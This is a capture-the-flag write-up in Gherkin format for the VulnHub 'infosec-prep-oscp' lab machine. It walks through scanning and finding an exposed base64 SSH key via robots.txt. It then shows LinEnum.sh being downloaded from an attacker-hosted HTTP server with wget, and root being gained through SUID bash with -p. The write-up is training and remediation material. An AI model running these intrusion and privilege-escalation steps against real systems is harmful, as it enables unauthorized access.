## Version 1.4.1
## language: en

Feature:

  TOE:
    infosec-prep-oscp
  Category:
    Exposure of Sensitive Information
  Location:
    http://192.168.56.101:80/secret.txt
  CWE:
    CWE-0200: Exposure of Sensitive Information to an
    Unauthorized Actor
  Rule:
    REQ.037:https://fluidattacks.com/products/rules/list/037/
  Goal:
    Find the flag.txt in /root/
  Recommendation:
    Avoid exposing sensitive data on a web server and use
    a strong cryptographic algorithm

  Background:
  Hacker's Software:
    | <Software name>            | <Version>  |
    | Kali Linux                 | 2021.1     |
    | Firefox Web Browser        | 78.8.0 esr |
    | gobuster                   | 3.1.0      |
    | nmap                       | 7.91       |
    | OpenSSH                    | 8.4p1      |
    | wget                       | 1.21       |
    | base64                     | 8.32       |

  TOE Information:
    Given a vulnhub machine called oscp in an ova file
    When I opened it in normal mode
    And at the initial screen banner I could see
    And is running Ubuntu Linux 20.04 LTS
    And an IP address 192.168.56.101
    And a login request for oscp user
    And with the information above I started to analyze it
    When I used the following nmap command for an initial view
    """
    nmap -O -sV -Pn -p- -n -T4 192.168.56.101 -e eth1
    """
    And gave me the next results about the target running services
    """
    Host discovery disabled (-Pn). All addresses will be marked 'up'
    and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 11:34 EDT
    Nmap scan report for 192.168.56.101
    Host is up (0.00032s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux;
    protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    MAC Address: 08:00:27:39:B7:28 (Oracle VirtualBox virtual NIC)
    Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%),
    Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%),
    Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (96%),
    Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%),
    Linux 3.1 (95%), Linux 3.2 (95%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    OS and Service detection performed. Please report any incorrect results
    at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
    """
    And I found two running services to explore (ssh and http)

  Scenario: Normal use case
    Given the information above
    Then I searched for an exploit for openSSH 8.2p1 service
    And I couldn't find any result
    Then I accesed to the web service in my browser
    And a simple web page was deployed as shown in [evidence](oscpuser.png)

  Scenario: Static detection
    Given I haven't accessed to the source code
    Then I didn't do this type of detection

  Scenario: Dynamic detection
    Given the services and ports discovered previously
    When I used gobuster and tried to find useful directories and files
    """
    gobuster dir -u http://192.168.56.101 -w
    /usr/share/wordlists/dirb/common.txt
    """
    Then the following files/directories were found
    """
    ===============================================================
    2021/03/17 15:25:35 Starting gobuster in directory enumeration mode
    ===============================================================
    /.hta                 (Status: 403) [Size: 279]
    /.htpasswd            (Status: 403) [Size: 279]
    /.htaccess            (Status: 403) [Size: 279]
    /javascript           (Status: 301) [Size: 321]
    [--> http://192.168.56.101/javascript/]
    /index.php            (Status: 301) [Size: 0]
    [--> http://192.168.56.101/]
    /robots.txt           (Status: 200) [Size: 36]
    /server-status        (Status: 403) [Size: 279]
    /wp-admin             (Status: 301) [Size: 319]
    [--> http://192.168.56.101/wp-admin/]
    /wp-content           (Status: 301) [Size: 321]
    [--> http://192.168.56.101/wp-content/]
    /wp-includes          (Status: 301) [Size: 322]
    [--> http://192.168.56.101/wp-includes/]
    /xmlrpc.php           (Status: 405) [Size: 42]
    """
    When I analyzed the previous output I could see it is a WordPress site
    And I tried to access some of those directories
    But nothing interesting was found
    When I analyzed robots.txt file I found something useful
    """
    http://192.168.56.101/robots.txt
    """
    And the result is
    """
    User-Agent: *
    Disallow: /secret.txt
    """
    Then I thought that txt file could be an issue

  Scenario: Exploitation
    Given the "secret.txt" file
    Then I read it and saw its content
    When I downloaded it with the next command
    """
    wget http://192.168.56.101/secret.txt
    """
    And with the file command I saw the following
    """
    file -i secret.txt

    secret.txt: text/plain; charset=us-ascii
    """
    Then I read it as shown in [evidence](secret.png)
    And based on the code I assumed it is base64
    Then I decoded it as displayed in this image [evidence](sshkey.png)
    And a ssh private key can be seen on the decoded text
    Then as I could see before ssh service is opened
    Then I tried to access with "oscp" user detected previously
    And as displayed in [evidence](sshdenied.png)
    Then the permissions of the private key are too open
    And I saw this
    """
    -rw-r--r-- 1 root root  3502 Jul  9  2020 secretDecoded.txt
    """
    Then I needed to change it with chmod command
    And with the help of chmod-calulator online service
    """
    https://chmod-calculator.com/
    """
    Then I modified the permissions as follows
    """
    chmod 500 secretDecoded.txt

    After the previous command the file attributes are:

    -r-x------  1 root root  2590 Mar 17 10:49 secretDecoded.txt
    """
    Then I tried it again and it succeeded
    And as shown in [evidence](sshoscp.png) and [evidence](userowned.png)
    And I've logged in as "oscp"
    Then I needed to escalate privileges to access /root folder
    And with the help of a script I checked privesc vectors
    """
    This is the folder of the script in gitHub:

    https://github.com/rebootuser/LinEnum
    """
    And I executed a simple http server in the "attacker" machine
    """
    python -m SimpleHTTPServer 7878
    Serving HTTP on 0.0.0.0 port 7878 ...
    """
    And downloaded the script in the target machine
    """
    From the target machine cli:

    -bash-5.0$ wget http://192.168.56.104:7878/LinEnum.sh
    --2021-03-17 15:40:31--  http://192.168.56.104:7878/LinEnum.sh
    Connecting to 192.168.56.104:7878... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 46631 (46K) [text/x-sh]
    Saving to: ‘LinEnum.sh’

    LinEnum.sh   100%[======================>] 45.54K --.-KB/s in 0s

    2021-03-17 15:40:31 (194 MB/s) - ‘LinEnum.sh’ saved [46631/46631]
    """
    When I run the script it showed me this
    """
    [+] Possibly interesting SUID files:
    -rwsr-sr-x 1 root root 1183448 Feb 25  2020 /usr/bin/bash
    """
    And I run bash from that folder "/usr/bin/bash"
    Then executed with -p option in order to change to root
    And as seen in [evidence](rootowned.png) I did it
    And I could get the flag as shown in [evidence](flag.png)

  Scenario: Remediation
    Given some files exposured on the main web server
    And the analysis of them
    Then an attacker can easily access to a service
    And take remote control of the machine
    Then it is suggested that none of this files can be viewed
    And downloaded or tampered from remote locations
    And by unauthorized users
    Then it is mandatory to use a strong cryptographic algorithm
    And to store those files
    And use authentication policies and protocols

  Scenario: Scoring
    Base: Attributes that are constants over time and organizations
      9.0/10 (High) - AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.2/10 (High) - E:U/RL:X/RC:X/
    Environmental: Unique and relevant attributes to a specific user environment
      8.9/10 (High) - CR:H/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found until date 2021-03-18
